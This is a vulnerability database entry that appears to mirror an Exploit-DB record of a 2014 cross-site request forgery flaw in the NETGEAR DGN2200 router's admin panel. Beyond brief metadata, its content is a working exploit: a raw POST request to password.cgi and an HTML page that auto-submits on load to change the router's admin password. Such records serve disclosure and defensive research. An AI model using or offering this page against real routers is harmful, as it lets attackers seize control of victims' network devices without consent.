ID

VAR-E-201405-0358


TITLE

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability

Trust: 0.6

sources: EDBNET: 21944

AFFECTED PRODUCTS

vendor: netgear, model: dgn2200 1.0.0.29 1.7.29 hots, scope: -, version: -

Trust: 0.6

sources: EDBNET: 21944

EXPLOIT

# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
# Date 02/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://netgear.com
# Affected Firmware version: 1.0.0.29_1.7.29_HotS
# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router

Summary
=======
A CSRF vulnerability was discovered in the admin panel of the NETGEAR DGN2200 router.

Vulnerability Description
=========================
Cross-Site Request Forgery (CSRF)

PoC
====
POST /password.cgi HTTP/1.1
Host: 10.0.0.138
Proxy-Connection: keep-alive
Content-Length: 122
Cache-Control: max-age=0
Authorization: Basic QWRtaW46VG9vbGJveDEj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.138
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.138/PWD_password.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply

Exploit
=========
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Admin password</H2>
<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
<input type="hidden" name="authTimeout" value="5"/>
<input type="hidden" name="cfAlert_Apply" value="Apply"/>
</form>
</body>
</html>

Trust: 0.6

sources: EDBNET: 21944

PRICE

free

Trust: 0.6

sources: EDBNET: 21944

TYPE

CSRF Vulnerability

Trust: 0.6

sources: EDBNET: 21944

EXTERNAL IDS

db: 0DAYTODAY, id: 22208

Trust: 0.6

db: EDBNET, id: 21944

Trust: 0.6

sources: EDBNET: 21944

REFERENCES

url: https://0day.today/exploits/22208

Trust: 0.6

sources: EDBNET: 21944

SOURCES

db: EDBNET, id: 21944

LAST UPDATE DATE

2022-07-27T10:00:58.790000+00:00


SOURCES RELEASE DATE

db: EDBNET, id: 21944, date: 2014-05-03T00:00:00